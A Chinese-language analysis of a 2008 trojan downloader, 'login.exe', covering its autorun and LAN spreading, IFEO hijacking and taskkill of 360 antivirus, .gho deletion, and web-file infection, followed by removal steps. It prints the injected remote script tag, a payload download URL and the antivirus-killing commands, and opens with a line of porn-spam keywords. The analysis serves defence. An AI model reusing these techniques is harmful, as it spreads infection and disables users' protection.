亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费

這是一個(gè)具有感染腳本功能和局域網(wǎng)傳播功能的木馬下載器

樣本信息：File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203

1.病毒初始化:創(chuàng)建互斥量HGFSMUTEX，保證系統(tǒng)內(nèi)只有一個(gè)實(shí)例在運(yùn)行

2.釋放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動(dòng)文件夾中達(dá)到開機(jī)啟動(dòng)自身的目的
C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\Default User\「開始」菜單\程序\啟動(dòng)\login.exe

3.執(zhí)行connnet.bat批處理內(nèi)的內(nèi)容

a.遍歷d~z盤 復(fù)制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目錄下

b.判斷中毒機(jī)器是否處于局域網(wǎng)，如果是則利用ipc漏洞建立一個(gè)空連接，并把a(bǔ)utorun.exe和%autorun.inf復(fù)制到機(jī)器的C$下面。

4.IFEO劫持某些殺毒軟件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不給你啟動(dòng).exe

5.試圖結(jié)束360軟件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f

6.遍歷所有磁盤刪除.gho文件

7.遍歷所有磁盤感染asp，htm，html，aspx，php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代碼

8.鏈接網(wǎng)絡(luò)下載木馬
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但鏈接已經(jīng)失效

解決方法：

到down.45it.com下載sreng和Xdelbox

1.復(fù)制如下文字 到剪貼板(假設(shè)系統(tǒng)在C盤)
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動(dòng)文件夾中達(dá)到開機(jī)啟動(dòng)自身的目的
C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\Default User\「開始」菜單\程序\啟動(dòng)\login.exe

打開Xdelbox.exe
在下面的大框中 單擊右鍵 點(diǎn)擊 “剪貼板導(dǎo)入不檢查路徑”
之后剛才復(fù)制的那個(gè)文件列表將出現(xiàn)在下面的大框中
然后再在下面的大框中單擊右鍵 點(diǎn)擊 “立即重啟執(zhí)行刪除”
軟件會(huì)自動(dòng)重啟計(jì)算機(jī)

重啟計(jì)算機(jī)以后 會(huì)有兩個(gè)系統(tǒng)進(jìn)入的選擇的倒計(jì)時(shí)界面
第一個(gè)是你原來的windows系統(tǒng)
第二個(gè)是這個(gè)軟件給你設(shè)定的dos系統(tǒng)
不用你管，它會(huì)自動(dòng)選擇進(jìn)入第二個(gè)系統(tǒng)
類似dos的界面滾動(dòng)完畢以后 病毒就被刪除了
之后他會(huì)自動(dòng)重啟進(jìn)入正常模式

2.打開sreng 啟動(dòng)項(xiàng)目 注冊(cè)表
刪除所有紅色的IFEO項(xiàng)目

3.建議屏蔽http://17vp.cn網(wǎng)站